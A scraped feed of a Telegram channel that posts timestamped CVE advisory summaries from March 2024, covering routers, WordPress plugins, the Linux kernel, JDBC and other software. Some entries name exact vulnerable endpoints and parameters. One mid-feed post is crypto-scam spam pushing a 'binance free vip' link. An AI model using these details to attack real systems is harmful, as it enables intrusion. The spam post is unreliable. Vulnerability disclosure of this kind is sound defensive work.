🚨 CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.🎖@cveNotify |
|
| 2024-03-25 18:07:31 |
🚨 CVE-2020-10256An issue was discovered in beta versions of the 1Password command-line tool prior to 0.5.5 and in beta versions of the 1Password SCIM bridge prior to 0.7.3. An insecure random number generator was used to generate various keys. An attacker with access to the user's encrypted data may be able to perform brute-force calculations of encryption keys and thus succeed at decryption.🎖@cveNotify |
|
| 2024-03-25 17:07:34 |
🚨 CVE-2024-28434The CRM platform Twenty is vulnerable to stored cross site scripting via file upload in version 0.3.0. A crafted svg file can trigger the execution of the javascript code.🎖@cveNotify |
|
| 2024-03-25 17:07:27 |
🚨 CVE-2024-28386An issue in Home-Made.io fastmagsync v.1.7.51 and before allows a remote attacker to execute arbitrary code via the getPhpBin() component.🎖@cveNotify |
|
| 2024-03-25 17:07:26 |
🚨 CVE-2024-1597pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.🎖@cveNotify |
|
| 2024-03-25 15:31:50 |
🚨 ATTENTION 🚨Friends, I asked for a special link from binance free vip channel, don't miss ❗️Only 100 Members Exclusive Link 👇👇👇https://t.me/+tY1KS_VpiFozNWZiLIMITED TIME OPEN LINK ❗️ |
|
| 2024-03-25 14:37:32 |
🚨 CVE-2024-28434The CRM platform Twenty is vulnerable to stored cross site scripting via file upload in version 0.3.0. A crafted svg file can trigger the execution of the javascript code.🎖@cveNotify |
|
| 2024-03-25 14:37:25 |
🚨 CVE-2024-25002Command Injection in the diagnostics interface of the Bosch Network Synchronizer allows unauthorized users full access to the device.🎖@cveNotify |
|
| 2024-03-25 14:37:24 |
🚨 CVE-2023-52159A stack-based buffer overflow vulnerability in gross 0.9.3 through 1.x before 1.0.4 allows remote attackers to trigger a denial of service (grossd daemon crash) or potentially execute arbitrary code in grossd via crafted SMTP transaction parameters that cause an incorrect strncat for a log entry.🎖@cveNotify |
|
| 2024-03-25 14:07:32 |
🚨 CVE-2023-37886Missing Authorization vulnerability in InspiryThemes RealHomes.This issue affects RealHomes: from n/a through 4.0.2.🎖@cveNotify |
|
| 2024-03-25 14:07:26 |
🚨 CVE-2023-37885Missing Authorization vulnerability in InspiryThemes RealHomes.This issue affects RealHomes: from n/a through 4.0.2.🎖@cveNotify |
|
| 2024-03-25 14:07:25 |
🚨 CVE-2024-28041HGW BL1500HM Ver 002.001.013 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary command.🎖@cveNotify |
|
| 2024-03-25 13:37:25 |
🚨 CVE-2024-2856A vulnerability, which was classified as critical, has been found in Tenda AC10 16.03.10.13/16.03.10.20. Affected by this issue is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument timeZone leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257780. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-25 12:37:32 |
🚨 CVE-2022-45356Missing Authorization vulnerability in Muffingroup Betheme.This issue affects Betheme: from n/a through 26.6.1.🎖@cveNotify |
|
| 2024-03-25 12:37:25 |
🚨 CVE-2022-45349Missing Authorization vulnerability in Muffingroup Betheme.This issue affects Betheme: from n/a through 26.6.1.🎖@cveNotify |
|
| 2024-03-25 12:37:24 |
🚨 CVE-2022-38057Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin.This issue affects Advance WordPress Search Plugin: from n/a through 1.2.1.🎖@cveNotify |
|
| 2024-03-25 11:37:24 |
🚨 CVE-2024-2864Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in KaineLabs Youzify - Buddypress Moderation.This issue affects Youzify - Buddypress Moderation: from n/a through 1.2.5.🎖@cveNotify |
|
| 2024-03-25 10:37:27 |
🚨 CVE-2021-47159In the Linux kernel, the following vulnerability has been resolved:net: dsa: fix a crash if ->get_sset_count() failsIf ds->ops->get_sset_count() fails then it "count" is a negative errorcode such as -EOPNOTSUPP. Because "i" is an unsigned int, the negativeerror code is type promoted to a very high value and the loop willcorrupt memory until the system crashes.Fix this by checking for error codes and changing the type of "i" tojust int.🎖@cveNotify |
|
| 2024-03-25 10:37:26 |
🚨 CVE-2021-47158In the Linux kernel, the following vulnerability has been resolved:net: dsa: sja1105: add error handling in sja1105_setup()If any of sja1105_static_config_load(), sja1105_clocking_setup() orsja1105_devlink_setup() fails, we can't just return in the middle ofsja1105_setup() or memory will leak. Add a cleanup path.🎖@cveNotify |
|
| 2024-03-25 08:37:24 |
🚨 CVE-2024-30187Anope before 2.0.15 does not prevent resetting the password of a suspended account.🎖@cveNotify |
|
| 2024-03-25 07:37:32 |
🚨 CVE-2024-24899Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in openEuler aops-zeus on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/aops-zeus/blob/master/zeus/conf/constant.Py.This issue affects aops-zeus: from 1.2.0 through 1.4.0.🎖@cveNotify |
|
| 2024-03-25 07:37:26 |
🚨 CVE-2024-24897Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in openEuler A-Tune-Collector on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/A-Tune-Collector/blob/master/atune_collector/plugin/monitor/process/sched.Py.This issue affects A-Tune-Collector: from 1.1.0-3 through 1.3.0.🎖@cveNotify |
|
| 2024-03-25 07:37:25 |
🚨 CVE-2024-24890Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in openEuler gala-gopher on Linux allows Command Injection. This vulnerability is associated with program files https://gitee.Com/openeuler/gala-gopher/blob/master/src/probes/extends/ebpf.Probe/src/ioprobe/ioprobe.C.This issue affects gala-gopher: through 1.0.2.🎖@cveNotify |
|
| 2024-03-25 07:37:24 |
🚨 CVE-2020-36826A vulnerability was found in AwesomestCode LiveBot. It has been classified as problematic. Affected is the function parseSend of the file js/parseMessage.js. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. Upgrading to version 0.1 is able to address this issue. The name of the patch is 57505527f838d1e46e8f93d567ba552a30185bfa. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-257784.🎖@cveNotify |
|
| 2024-03-25 06:37:24 |
🚨 CVE-2022-36407Insertion of Sensitive Information into Log File vulnerability in Hitachi Virtual Storage Platform, Hitachi Virtual Storage Platform VP9500, Hitachi Virtual Storage Platform G1000, G1500, Hitachi Virtual Storage Platform F1500, Hitachi Virtual Storage Platform 5100, 5500, 5100H, 5500H, Hitachi Virtual Storage Platform 5200, 5600, 5200H, 5600H, Hitachi Unified Storage VM, Hitachi Virtual Storage Platform G100, G200, G400, G600, G800, Hitachi Virtual Storage Platform F400, F600, F800, Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900, Hitachi Virtual Storage Platform F350, F370, F700, F900, Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H allows local users to gain sensitive information.This issue affects Hitachi Virtual Storage Platform: before DKCMAIN Ver. 70-06-74-00/00, SVP Ver. 70-06-58/00; Hitachi Virtual Storage Platform VP9500: before DKCMAIN Ver. 70-06-74-00/00, SVP Ver. 70-06-58/00; Hitachi Virtual Storage Platform G1000, G1500: before DKCMAIN Ver. 80-06-92-00/00, SVP Ver. 80-06-87/00; Hitachi Virtual Storage Platform F1500: before DKCMAIN Ver. 80-06-92-00/00, SVP Ver. 80-06-87/00; Hitachi Virtual Storage Platform 5100, 5500,5100H, 5500H: before DKCMAIN Ver. 90-08-81-00/00, SVP Ver. 90-08-81/00, before DKCMAIN Ver. 90-08-62-00/00, SVP Ver. 90-08-62/00, before DKCMAIN Ver. 90-08-43-00/00, SVP Ver. 90-08-43/00; Hitachi Virtual Storage Platform 5200, 5600,5200H, 5600H: before DKCMAIN Ver. 90-08-81-00/00, SVP Ver. 90-08-81/00, before DKCMAIN Ver. 90-08-62-00/00, SVP Ver. 90-08-62/00, before DKCMAIN Ver. 90-08-43-00/00, SVP Ver. 90-08-43/00; Hitachi Unified Storage VM: before DKCMAIN Ver. 73-03-75-X0/00, SVP Ver. 73-03-74/00, before DKCMAIN Ver. 73(75)-03-75-X0/00, SVP Ver. 73(75)-03-74/00; Hitachi Virtual Storage Platform G100, G200, G400, G600, G800: before DKCMAIN Ver. 83-06-19-X0/00, SVP Ver. 83-06-20-X0/00, before DKCMAIN Ver. 83-05-47-X0/00, SVP Ver. 83-05-51-X0/00; Hitachi Virtual Storage Platform F400, F600, F800: before DKCMAIN Ver. 83-06-19-X0/00, SVP Ver. 83-06-20-X0/00, before DKCMAIN Ver. 83-05-47-X0/00, SVP Ver. 83-05-51-X0/00; Hitachi Virtual Storage Platform G130, G150, G350, G370, G700, G900: before DKCMAIN Ver. 88-08-09-XX/00, SVP Ver. 88-08-11-X0/02; Hitachi Virtual Storage Platform F350, F370, F700, F900: before DKCMAIN Ver. 88-08-09-XX/00, SVP Ver. 88-08-11-X0/02; Hitachi Virtual Storage Platform E390, E590, E790, E990, E1090, E390H, E590H, E790H, E1090H: before DKCMAIN Ver. 93-06-81-X0/00, SVP Ver. 93-06-81-X0/00, before DKCMAIN Ver. 93-06-62-X0/00, SVP Ver. 93-06-62-X0/00, before DKCMAIN Ver. 93-06-43-X0/00, SVP Ver. 93-06-43-X0/00.🎖@cveNotify |
|
| 2024-03-25 05:37:32 |
🚨 CVE-2024-1231The CM Download Manager WordPress plugin before 2.9.0 does not have CSRF checks in some places, which could allow attackers to make logged in admins unpublish downloads via a CSRF attack🎖@cveNotify |
|
| 2024-03-25 05:37:25 |
🚨 CVE-2023-30480Missing Authorization vulnerability in Sparkle WP Educenter.This issue affects Educenter: from n/a through 1.5.5.🎖@cveNotify |
|
| 2024-03-25 05:37:24 |
🚨 CVE-2022-40540Memory corruption due to buffer copy without checking the size of input while loading firmware in Linux Kernel.🎖@cveNotify |
|
| 2024-03-25 04:37:25 |
🚨 CVE-2024-29071HGW BL1500HM Ver 002.001.013 and earlier contains a use of week credentials issue. A network-adjacent unauthenticated attacker may change the system settings.🎖@cveNotify |
|
| 2024-03-25 04:37:24 |
🚨 CVE-2024-28041HGW BL1500HM Ver 002.001.013 and earlier allows a network-adjacent unauthenticated attacker to execute an arbitrary command.🎖@cveNotify |
|
| 2024-03-25 02:07:36 |
🚨 CVE-2024-26247Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-03-25 02:07:30 |
🚨 CVE-2024-2828A vulnerability, which was classified as critical, was found in lakernote EasyAdmin up to 20240315. Affected is the function thumbnail of the file src/main/java/com/laker/admin/module/sys/controller/IndexController.java. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 23165d8cb569048c531150f194fea39f8800b8d5. It is recommended to apply a patch to fix this issue. VDB-257718 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-25 02:07:29 |
🚨 CVE-2024-2825A vulnerability classified as critical has been found in lakernote EasyAdmin up to 20240315. This affects an unknown part of the file /ureport/designer/saveReportFile. The manipulation of the argument file leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257715.🎖@cveNotify |
|
| 2024-03-25 02:07:28 |
🚨 CVE-2023-5685A flaw was found in XNIO. The XNIO NotifierState that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large can lead to uncontrolled resource management and a possible denial of service (DoS).🎖@cveNotify |
|
| 2024-03-25 01:37:38 |
🚨 CVE-2021-37159hso_free_net_device in drivers/net/usb/hso.c in the Linux kernel through 5.13.4 calls unregister_netdev without checking for the NETREG_REGISTERED state, leading to a use-after-free and a double free.🎖@cveNotify |
|
| 2024-03-25 01:37:31 |
🚨 CVE-2021-32606In the Linux kernel 5.11 through 5.12.2, isotp_setsockopt in net/can/isotp.c allows privilege escalation to root by leveraging a use-after-free. (This does not affect earlier versions that lack CAN ISOTP SF_BROADCAST support.)🎖@cveNotify |
|
| 2024-03-25 01:37:30 |
🚨 CVE-2021-29154BPF JIT compilers in the Linux kernel through 5.11.12 have incorrect computation of branch displacements, allowing them to execute arbitrary code within the kernel context. This affects arch/x86/net/bpf_jit_comp.c and arch/x86/net/bpf_jit_comp32.c.🎖@cveNotify |
|
| 2024-03-25 01:37:26 |
🚨 CVE-2021-28039An issue was discovered in the Linux kernel 5.9.x through 5.11.3, as used with Xen. In some less-common configurations, an x86 PV guest OS user can crash a Dom0 or driver domain via a large amount of I/O activity. The issue relates to misuse of guest physical addresses when a configuration has CONFIG_XEN_UNPOPULATED_ALLOC but not CONFIG_XEN_BALLOON_MEMORY_HOTPLUG.🎖@cveNotify |
|
| 2024-03-25 01:37:25 |
🚨 CVE-2021-26930An issue was discovered in the Linux kernel 3.11 through 5.10.16, as used by Xen. To service requests to the PV backend, the driver maps grant references provided by the frontend. In this process, errors may be encountered. In one case, an error encountered earlier might be discarded by later processing, resulting in the caller assuming successful mapping, and hence subsequent operations trying to access space that wasn't mapped. In another case, internal state would be insufficiently updated, preventing safe recovery from the error. This affects drivers/block/xen-blkback/blkback.c.🎖@cveNotify |
|
| 2024-03-24 23:37:25 |
🚨 CVE-2023-6597An issue was found in the CPython `tempfile.TemporaryDirectory` class affecting versions 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.The tempfile.TemporaryDirectory class would dereference symlinks during cleanup of permissions-related errors. This means users which can run privileged programs are potentially able to modify permissions of files referenced by symlinks in some circumstances.🎖@cveNotify |
|
| 2024-03-24 23:37:24 |
🚨 CVE-2021-42739The firewire subsystem in the Linux kernel through 5.14.13 has a buffer overflow related to drivers/media/firewire/firedtv-avc.c and drivers/media/firewire/firedtv-ci.c, because avc_ca_pmt mishandles bounds checking.🎖@cveNotify |
|
| 2024-03-24 20:37:25 |
🚨 CVE-2024-29187WiX toolset lets developers create installers for Windows Installer, the Windows installation engine. When a bundle runs as SYSTEM user, Burn uses GetTempPathW which points to an insecure directory C:\Windows\Temp to drop and load multiple binaries. Standard users can hijack the binary before it's loaded in the application resulting in elevation of privileges. This vulnerability is fixed in 3.14.1 and 4.0.5.🎖@cveNotify |
|
| 2024-03-24 20:37:24 |
🚨 CVE-2024-29034CarrierWave is a solution for file uploads for Rails, Sinatra and other Ruby web frameworks. The vulnerability CVE-2023-49090 wasn't fully addressed. This vulnerability is caused by the fact that when uploading to object storage, including Amazon S3, it is possible to set a Content-Type value that is interpreted by browsers to be different from what's allowed by `content_type_allowlist`, by providing multiple values separated by commas. This bypassed value can be used to cause XSS. Upgrade to 3.0.7 or 2.2.6.🎖@cveNotify |
|
| 2024-03-24 19:37:24 |
🚨 CVE-2024-29194OneUptime is a solution for monitoring and managing online services. The vulnerability lies in the improper validation of client-side stored data within the web application. Specifically, the is_master_admin key, stored in the local storage of the browser, can be manipulated by an attacker. By changing this key from false to true, the application grants administrative privileges to the user, without proper server-side validation. This has been patched in 7.0.1815.🎖@cveNotify |
|
| 2024-03-24 12:37:24 |
🚨 CVE-2020-36825A vulnerability has been found in cyberaz0r WebRAT up to 20191222 and classified as critical. This vulnerability affects the function download_file of the file Server/api.php. The manipulation of the argument name leads to unrestricted upload. The attack can be initiated remotely. The patch is identified as 0c394a795b9c10c07085361e6fcea286ee793701. It is recommended to apply a patch to fix this issue. VDB-257782 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-24 07:37:25 |
🚨 CVE-2024-2856A vulnerability, which was classified as critical, has been found in Tenda AC10 16.03.10.13/16.03.10.20. Affected by this issue is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument timeZone leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257780. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 06:37:25 |
🚨 CVE-2024-2855A vulnerability classified as critical was found in Tenda AC15 15.03.05.18/15.03.05.19/15.03.20. Affected by this vulnerability is the function fromSetSysTime of the file /goform/SetSysTimeCfg. The manipulation of the argument time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257779. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 06:37:24 |
🚨 CVE-2024-2854A vulnerability classified as critical has been found in Tenda AC18 15.03.05.05. Affected is the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257778 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 05:37:25 |
🚨 CVE-2024-2853A vulnerability was found in Tenda AC10U 15.03.06.48/15.03.06.49. It has been rated as critical. This issue affects the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 05:37:24 |
🚨 CVE-2024-2852A vulnerability was found in Tenda AC15 15.03.20_multi. It has been declared as critical. This vulnerability affects the function saveParentControlInfo of the file /goform/saveParentControlInfo. The manipulation of the argument urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257776. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 03:37:26 |
🚨 CVE-2024-2851A vulnerability was found in Tenda AC15 15.03.05.18/15.03.20_multi. It has been classified as critical. This affects the function formSetSambaConf of the file /goform/setsambacfg. The manipulation of the argument usbName leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257775. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 03:37:25 |
🚨 CVE-2024-22871An issue in Clojure versions 1.20 to 1.12.0-alpha5 allows an attacker to cause a denial of service (DoS) via the clojure.core$partial$fn__5920 function.🎖@cveNotify |
|
| 2024-03-24 03:37:24 |
🚨 CVE-2023-4256Within tcpreplay's tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack.🎖@cveNotify |
|
| 2024-03-24 02:37:24 |
🚨 CVE-2024-2850A vulnerability was found in Tenda AC15 15.03.05.18 and classified as critical. Affected by this issue is the function saveParentControlInfo of the file /goform/saveParentControlInfo. The manipulation of the argument urls leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257774 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-24 01:37:24 |
🚨 CVE-2018-25100The Mojolicious module before 7.66 for Perl may leak cookies in certain situations related to multiple similar cookies for the same domain. This affects Mojo::UserAgent::CookieJar.🎖@cveNotify |
|
| 2024-03-24 00:37:24 |
🚨 CVE-2024-1603paddlepaddle/paddle 2.6.0 allows arbitrary file read via paddle.vision.ops.read_file.🎖@cveNotify |
|
| 2024-03-23 23:37:24 |
🚨 CVE-2024-24725Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI.🎖@cveNotify |
|
| 2024-03-23 22:37:24 |
🚨 CVE-2024-23755ClickUp Desktop before 3.3.77 on macOS and Windows allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode.🎖@cveNotify |
|
| 2024-03-23 19:37:24 |
🚨 CVE-2024-1603confirmed🎖@cveNotify |
|
| 2024-03-23 18:37:24 |
🚨 CVE-2024-2849A vulnerability classified as critical was found in SourceCodester Simple File Manager 1.0. This vulnerability affects unknown code. The manipulation of the argument photo leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257770 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-23 17:37:24 |
🚨 CVE-2021-47154The Net::CIDR::Lite module before 0.22 for Perl does not properly consider extraneous zero characters at the beginning of an IP address string, which (in some situations) allows attackers to bypass access control that is based on IP addresses.🎖@cveNotify |
|
| 2024-03-23 15:37:25 |
🚨 CVE-2024-24835Missing Authorization vulnerability in realmag777 BEAR.This issue affects BEAR: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-03-23 15:37:24 |
🚨 CVE-2024-24832Missing Authorization vulnerability in Metagauss EventPrime.This issue affects EventPrime: from n/a through 3.3.9.🎖@cveNotify |
|
| 2024-03-23 11:37:24 |
🚨 CVE-2023-3618A flaw was found in libtiff. A specially crafted tiff file can lead to a segmentation fault due to a buffer overflow in the Fax3Encode function in libtiff/tif_fax3.c, resulting in a denial of service.🎖@cveNotify |
|
| 2024-03-23 06:37:24 |
🚨 CVE-2024-2832A vulnerability classified as problematic was found in Campcodes Online Shopping System 1.0. This vulnerability affects unknown code of the file /offersmail.php. The manipulation of the argument email leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257752.🎖@cveNotify |
|
| 2024-03-23 04:37:25 |
🚨 CVE-2024-2326The Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.6.3. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's configuration including stripe integration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-23 04:37:24 |
🚨 CVE-2024-1049The Page Builder Gutenberg Blocks – CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Widget's in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping on the link value. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-23 03:37:32 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2024-03-23 03:37:26 |
🚨 CVE-2023-5366A flaw was found in Open vSwitch that allows ICMPv6 Neighbor Advertisement packets between virtual machines to bypass OpenFlow rules. This issue may allow a local attacker to create specially crafted packets with a modified or spoofed target IP address field that can redirect ICMPv6 traffic to arbitrary IP addresses.🎖@cveNotify |
|
| 2024-03-23 03:37:25 |
🚨 CVE-2022-38223There is an out-of-bounds write in checkType located in etc.c in w3m 0.5.3. It can be triggered by sending a crafted HTML file to the w3m binary. It allows an attacker to cause Denial of Service or possibly have unspecified other impact.🎖@cveNotify |
|
| 2024-03-23 03:37:24 |
🚨 CVE-2007-4559Directory traversal vulnerability in the (1) extract and (2) extractall functions in the tarfile module in Python allows user-assisted remote attackers to overwrite arbitrary files via a .. (dot dot) sequence in filenames in a TAR archive, a related issue to CVE-2001-1267.🎖@cveNotify |
|
| 2024-03-23 02:37:25 |
🚨 CVE-2024-2025The "BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages" plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.20 via deserialization of untrusted input in the get_simple_request function. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-03-23 02:37:24 |
🚨 CVE-2024-1697The Custom WooCommerce Checkout Fields Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the save_wcfe_options function in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-23 00:37:25 |
🚨 CVE-2024-29059.NET Framework Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-03-23 00:37:24 |
🚨 CVE-2024-20677A security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365. As of February 13, 2024, the ability to insert FBX files has also been disabled in 3D Viewer.3D models in Office documents that were previously inserted from a FBX file will continue to work as expected unless the Link to File option was chosen at insert time.This change is effective as of the January 9, 2024 security update.🎖@cveNotify |
|
| 2024-03-22 23:37:24 |
🚨 CVE-2024-29190Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. In version 3.9.5 Beta and prior, MobSF does not perform any input validation when extracting the hostnames in `android:host`, so requests can also be sent to local hostnames. This can lead to server-side request forgery. An attacker can cause the server to make a connection to internal-only services within the organization's infrastructure. Commit 5a8eeee73c5f504a6c3abdf2a139a13804efdb77 has a hotfix for this issue.🎖@cveNotify |
|
| 2024-03-22 22:37:25 |
🚨 CVE-2024-29057Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-03-22 22:37:24 |
🚨 CVE-2024-26247Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-03-22 20:37:27 |
🚨 CVE-2024-2828A vulnerability, which was classified as critical, was found in lakernote EasyAdmin up to 20240315. Affected is the function thumbnail of the file src/main/java/com/laker/admin/module/sys/controller/IndexController.java. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 23165d8cb569048c531150f194fea39f8800b8d5. It is recommended to apply a patch to fix this issue. VDB-257718 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-22 19:37:35 |
🚨 CVE-2024-2826A vulnerability classified as problematic was found in lakernote EasyAdmin up to 20240315. This vulnerability affects unknown code of the file /ureport/designer/saveReportFile. The manipulation leads to xml external entity reference. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257716.🎖@cveNotify |
|
| 2024-03-22 19:37:31 |
🚨 CVE-2023-5685A flaw was found in XNIO. The XNIO NotifierState that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large can lead to uncontrolled resource management and a possible denial of service (DoS).🎖@cveNotify |
|
| 2024-03-22 19:37:30 |
🚨 CVE-2024-21892On Linux, Node.js ignores certain environment variables if those may have been set by an unprivileged user while the process is running with elevated privileges with the only exception of CAP_NET_BIND_SERVICE.Due to a bug in the implementation of this exception, Node.js incorrectly applies this exception even when certain other capabilities have been set.This allows unprivileged users to inject code that inherits the process's elevated privileges.🎖@cveNotify |
|
| 2024-03-22 19:37:26 |
🚨 CVE-2024-1635A vulnerability was found in Undertow. This vulnerability impacts a server that supports the wildfly-http-client protocol. Whenever a malicious user opens and closes a connection with the HTTP port of the server and then closes the connection immediately, the server will end with both memory and open file limits exhausted at some point, depending on the amount of memory available. At HTTP upgrade to remoting, the WriteTimeoutStreamSinkConduit leaks connections if RemotingConnection is closed by Remoting ServerConnectionOpenListener. Because the remoting connection originates in Undertow as part of the HTTP upgrade, there is an external layer to the remoting connection. This connection is unaware of the outermost layer when closing the connection during the connection opening procedure. Hence, the Undertow WriteTimeoutStreamSinkConduit is not notified of the closed connection in this scenario. Because WriteTimeoutStreamSinkConduit creates a timeout task, the whole dependency tree leaks via that task, which is added to XNIO WorkerThread. So, the workerThread points to the Undertow conduit, which contains the connections and causes the leak.🎖@cveNotify |
|
| 2024-03-22 19:37:25 |
🚨 CVE-2023-29153Uncontrolled resource consumption for some Intel(R) SPS firmware before version SPS_E5_06.01.04.002.0 may allow a privileged user to potentially enable denial of service via network access.🎖@cveNotify |
|
| 2024-03-22 19:37:24 |
